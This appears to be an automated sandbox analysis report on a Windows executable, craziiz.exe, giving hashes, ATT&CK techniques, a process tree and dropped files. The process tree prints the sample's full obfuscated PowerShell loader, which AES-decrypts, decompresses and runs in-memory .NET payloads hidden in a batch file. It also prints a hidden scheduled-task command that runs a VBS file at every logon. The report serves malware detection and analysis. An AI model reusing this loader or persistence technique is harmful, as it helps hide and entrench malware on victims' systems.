68efb7a8332b4504485b96570f5f2a9959b81d832e723bf654e59aa820f73e4d

Resubmissions

20-07-2024 10:19

240720-mcxjtaxfnn 8

20-07-2024 10:17

240720-mbvc3a1ejd 8

20-07-2024 10:15

240720-man5na1dng 8

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
20-07-2024 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

craziiz.exe
Size

19.2MB
MD5

23c8a0898eb62951996a941d38335b08
SHA1

96f584613b0c35ae206d569db76c97d9b5ac221c
SHA256

68efb7a8332b4504485b96570f5f2a9959b81d832e723bf654e59aa820f73e4d
SHA512

130756ca4e45596361ade6ce5143a6bcb94acc6305c7f774cec59f4ef5984c3e9fdfd68471f8fbb4786781c52e06b207f7f9a1356894684ba83afd35924389f1
SSDEEP

393216:2bdrQcQV3iiD6BFcltgFwcIClpBmyR2dKZLdzECuBm0O1Y1L:2xCVSE3lXcICj6KZLND6h1L

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4352	powershell.exe
380	powershell.exe
3332	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	craziiz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4348	4352	WerFault.exe	106

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
380	powershell.exe
380	powershell.exe
3332	powershell.exe
3332	powershell.exe
4352	powershell.exe
4352	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	380	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeIncreaseQuotaPrivilege	3332	powershell.exe
Token: SeSecurityPrivilege	3332	powershell.exe
Token: SeTakeOwnershipPrivilege	3332	powershell.exe
Token: SeLoadDriverPrivilege	3332	powershell.exe
Token: SeSystemProfilePrivilege	3332	powershell.exe
Token: SeSystemtimePrivilege	3332	powershell.exe
Token: SeProfSingleProcessPrivilege	3332	powershell.exe
Token: SeIncBasePriorityPrivilege	3332	powershell.exe
Token: SeCreatePagefilePrivilege	3332	powershell.exe
Token: SeBackupPrivilege	3332	powershell.exe
Token: SeRestorePrivilege	3332	powershell.exe
Token: SeShutdownPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeSystemEnvironmentPrivilege	3332	powershell.exe
Token: SeRemoteShutdownPrivilege	3332	powershell.exe
Token: SeUndockPrivilege	3332	powershell.exe
Token: SeManageVolumePrivilege	3332	powershell.exe
Token: 33	3332	powershell.exe
Token: 34	3332	powershell.exe
Token: 35	3332	powershell.exe
Token: 36	3332	powershell.exe
Token: SeIncreaseQuotaPrivilege	3332	powershell.exe
Token: SeSecurityPrivilege	3332	powershell.exe
Token: SeTakeOwnershipPrivilege	3332	powershell.exe
Token: SeLoadDriverPrivilege	3332	powershell.exe
Token: SeSystemProfilePrivilege	3332	powershell.exe
Token: SeSystemtimePrivilege	3332	powershell.exe
Token: SeProfSingleProcessPrivilege	3332	powershell.exe
Token: SeIncBasePriorityPrivilege	3332	powershell.exe
Token: SeCreatePagefilePrivilege	3332	powershell.exe
Token: SeBackupPrivilege	3332	powershell.exe
Token: SeRestorePrivilege	3332	powershell.exe
Token: SeShutdownPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeSystemEnvironmentPrivilege	3332	powershell.exe
Token: SeRemoteShutdownPrivilege	3332	powershell.exe
Token: SeUndockPrivilege	3332	powershell.exe
Token: SeManageVolumePrivilege	3332	powershell.exe
Token: 33	3332	powershell.exe
Token: 34	3332	powershell.exe
Token: 35	3332	powershell.exe
Token: 36	3332	powershell.exe
Token: SeIncreaseQuotaPrivilege	3332	powershell.exe
Token: SeSecurityPrivilege	3332	powershell.exe
Token: SeTakeOwnershipPrivilege	3332	powershell.exe
Token: SeLoadDriverPrivilege	3332	powershell.exe
Token: SeSystemProfilePrivilege	3332	powershell.exe
Token: SeSystemtimePrivilege	3332	powershell.exe
Token: SeProfSingleProcessPrivilege	3332	powershell.exe
Token: SeIncBasePriorityPrivilege	3332	powershell.exe
Token: SeCreatePagefilePrivilege	3332	powershell.exe
Token: SeBackupPrivilege	3332	powershell.exe
Token: SeRestorePrivilege	3332	powershell.exe
Token: SeShutdownPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeSystemEnvironmentPrivilege	3332	powershell.exe
Token: SeRemoteShutdownPrivilege	3332	powershell.exe
Token: SeUndockPrivilege	3332	powershell.exe
Token: SeManageVolumePrivilege	3332	powershell.exe
Token: 33	3332	powershell.exe
Token: 34	3332	powershell.exe
Token: 35	3332	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1028 wrote to memory of 4304	1028	craziiz.exe	87
PID 1028 wrote to memory of 4304	1028	craziiz.exe	87
PID 1028 wrote to memory of 4304	1028	craziiz.exe	87
PID 4304 wrote to memory of 1932	4304	cmd.exe	90
PID 4304 wrote to memory of 1932	4304	cmd.exe	90
PID 4304 wrote to memory of 1932	4304	cmd.exe	90
PID 4304 wrote to memory of 380	4304	cmd.exe	91
PID 4304 wrote to memory of 380	4304	cmd.exe	91
PID 4304 wrote to memory of 380	4304	cmd.exe	91
PID 380 wrote to memory of 3332	380	powershell.exe	99
PID 380 wrote to memory of 3332	380	powershell.exe	99
PID 380 wrote to memory of 3332	380	powershell.exe	99
PID 380 wrote to memory of 4656	380	powershell.exe	102
PID 380 wrote to memory of 4656	380	powershell.exe	102
PID 380 wrote to memory of 4656	380	powershell.exe	102
PID 4656 wrote to memory of 4544	4656	WScript.exe	103
PID 4656 wrote to memory of 4544	4656	WScript.exe	103
PID 4656 wrote to memory of 4544	4656	WScript.exe	103
PID 4544 wrote to memory of 2812	4544	cmd.exe	105
PID 4544 wrote to memory of 2812	4544	cmd.exe	105
PID 4544 wrote to memory of 2812	4544	cmd.exe	105
PID 4544 wrote to memory of 4352	4544	cmd.exe	106
PID 4544 wrote to memory of 4352	4544	cmd.exe	106
PID 4544 wrote to memory of 4352	4544	cmd.exe	106

C:\Users\Admin\AppData\Local\Temp\craziiz.exe
"C:\Users\Admin\AppData\Local\Temp\craziiz.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uhfM5Ekrw+ocGOKftnYSyasYRZICC7P0NnnY/5IJf88='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DB+I746Y3DoHXqOsfJWvzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pZbag=New-Object System.IO.MemoryStream(,$param_var); $XGRdT=New-Object System.IO.MemoryStream; $oFTsX=New-Object System.IO.Compression.GZipStream($pZbag, [IO.Compression.CompressionMode]::Decompress); $oFTsX.CopyTo($XGRdT); $oFTsX.Dispose(); $pZbag.Dispose(); $XGRdT.Dispose(); $XGRdT.ToArray();}function execute_function($param_var,$param2_var){ $cGsoe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $onmhY=$cGsoe.EntryPoint; $onmhY.Invoke($null, $param2_var);}$LpXdB = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat';$host.UI.RawUI.WindowTitle = $LpXdB;$JpiRJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LpXdB).Split([Environment]::NewLine);foreach ($PtFHO in $JpiRJ) { if ($PtFHO.StartsWith('sqAngQnziQIztPnNNXoF')) { $Vyenk=$PtFHO.Substring(20); break; }}$payloads_var=[string[]]$Vyenk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_51_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_51.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3332
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_51.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_51.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4544
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uhfM5Ekrw+ocGOKftnYSyasYRZICC7P0NnnY/5IJf88='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DB+I746Y3DoHXqOsfJWvzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pZbag=New-Object System.IO.MemoryStream(,$param_var); $XGRdT=New-Object System.IO.MemoryStream; $oFTsX=New-Object System.IO.Compression.GZipStream($pZbag, [IO.Compression.CompressionMode]::Decompress); $oFTsX.CopyTo($XGRdT); $oFTsX.Dispose(); $pZbag.Dispose(); $XGRdT.Dispose(); $XGRdT.ToArray();}function execute_function($param_var,$param2_var){ $cGsoe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $onmhY=$cGsoe.EntryPoint; $onmhY.Invoke($null, $param2_var);}$LpXdB = 'C:\Users\Admin\AppData\Roaming\Windows_Log_51.bat';$host.UI.RawUI.WindowTitle = $LpXdB;$JpiRJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LpXdB).Split([Environment]::NewLine);foreach ($PtFHO in $JpiRJ) { if ($PtFHO.StartsWith('sqAngQnziQIztPnNNXoF')) { $Vyenk=$PtFHO.Substring(20); break; }}$payloads_var=[string[]]$Vyenk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2812
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4352
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 2912
        7⤵
        Program crash
        
        PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4352 -ip 4352
1⤵
PID:3560

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
3337d66209faa998d52d781d0ff2d804

SHA1
6594b85a70f998f79f43cdf1ca56137997534156

SHA256
9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

SHA512
8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
722e2f7f788c8817595984405fc2e213

SHA1
f062c071a8916d21e332d92f7f37044ad0ab50ee

SHA256
49732b647399cb702dbbe9086175e9ad4edca28ae210c2ae6867016c7efdf49d

SHA512
6ded85f62db34e75571afbacc59e63dfa899c305c7566e4071ad07f14f9a0a00740d56dc825bdb1c91753c1747e808079a1a15b9d03939c4d640dc58939bb917

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.bat

Filesize
24.4MB

MD5
cf638de94cae2c43e062d62d05ec4126

SHA1
2d2a77f5f8f0b980b119f689b03683cb5ebe1d76

SHA256
50e1ff826b6c14a386107504fe2af420c295b538da3227284f427cbaf0c8a098

SHA512
080850bcf4390646f8fe15406be295df7ddfb9772b0dd47fd6a30aa180c257139ee8dc826f97ebaaf435cd7f5b68ea8fd50c909d01dcb641132812ff9682bf7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuia4b5j.a3u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_51.vbs

Filesize
114B

MD5
9d23bc48d9520c79e5ada71db154a3a1

SHA1
0cac5625079b81bc29360f6dbbb78f0a6c555d6a

SHA256
2bf1ebb0a1754d96b5e0a3e688df9152b41d38af089ac727dd81456bb2da82dd

SHA512
daf258c38f652e693bb727f74ae9a14f80dbb468a075d1c04925329a175ad0b0c69f137bf281371631c7d0c4505b92e11284ef0fcb7678878768bb2e48fbb9fe

Download Submit
memory/380-28-0x00000000078D0000-0x00000000078EA000-memory.dmp

Filesize
104KB

Download
memory/380-31-0x0000000029FB0000-0x000000002A554000-memory.dmp

Filesize
5.6MB

Download
memory/380-12-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/380-10-0x0000000005700000-0x0000000005722000-memory.dmp

Filesize
136KB

Download
memory/380-22-0x00000000060F0000-0x0000000006444000-memory.dmp

Filesize
3.3MB

Download
memory/380-23-0x00000000065B0000-0x00000000065CE000-memory.dmp

Filesize
120KB

Download
memory/380-24-0x0000000006660000-0x00000000066AC000-memory.dmp

Filesize
304KB

Download
memory/380-25-0x00000000069E0000-0x0000000006A24000-memory.dmp

Filesize
272KB

Download
memory/380-26-0x0000000007950000-0x00000000079C6000-memory.dmp

Filesize
472KB

Download
memory/380-27-0x0000000008050000-0x00000000086CA000-memory.dmp

Filesize
6.5MB

Download
memory/380-9-0x0000000072E40000-0x00000000735F0000-memory.dmp

Filesize
7.7MB

Download
memory/380-29-0x0000000002B30000-0x0000000002B38000-memory.dmp

Filesize
32KB

Download
memory/380-30-0x0000000047880000-0x0000000049050000-memory.dmp

Filesize
23.8MB

Download
memory/380-11-0x0000000005FA0000-0x0000000006006000-memory.dmp

Filesize
408KB

Download
memory/380-5-0x0000000072E4E000-0x0000000072E4F000-memory.dmp

Filesize
4KB

Download
memory/380-6-0x00000000030C0000-0x00000000030F6000-memory.dmp

Filesize
216KB

Download
memory/380-70-0x0000000072E40000-0x00000000735F0000-memory.dmp

Filesize
7.7MB

Download
memory/380-68-0x0000000072E40000-0x00000000735F0000-memory.dmp

Filesize
7.7MB

Download
memory/380-67-0x0000000072E4E000-0x0000000072E4F000-memory.dmp

Filesize
4KB

Download
memory/380-7-0x00000000057B0000-0x0000000005DD8000-memory.dmp

Filesize
6.2MB

Download
memory/380-8-0x0000000072E40000-0x00000000735F0000-memory.dmp

Filesize
7.7MB

Download
memory/3332-58-0x0000000006FF0000-0x0000000007001000-memory.dmp

Filesize
68KB

Download
memory/3332-57-0x0000000007070000-0x0000000007106000-memory.dmp

Filesize
600KB

Download
memory/3332-56-0x0000000006E60000-0x0000000006E6A000-memory.dmp

Filesize
40KB

Download
memory/3332-55-0x0000000006D10000-0x0000000006DB3000-memory.dmp

Filesize
652KB

Download
memory/3332-54-0x00000000060B0000-0x00000000060CE000-memory.dmp

Filesize
120KB

Download
memory/3332-44-0x000000006F710000-0x000000006F75C000-memory.dmp

Filesize
304KB

Download
memory/3332-43-0x0000000006CD0000-0x0000000006D02000-memory.dmp

Filesize
200KB

Download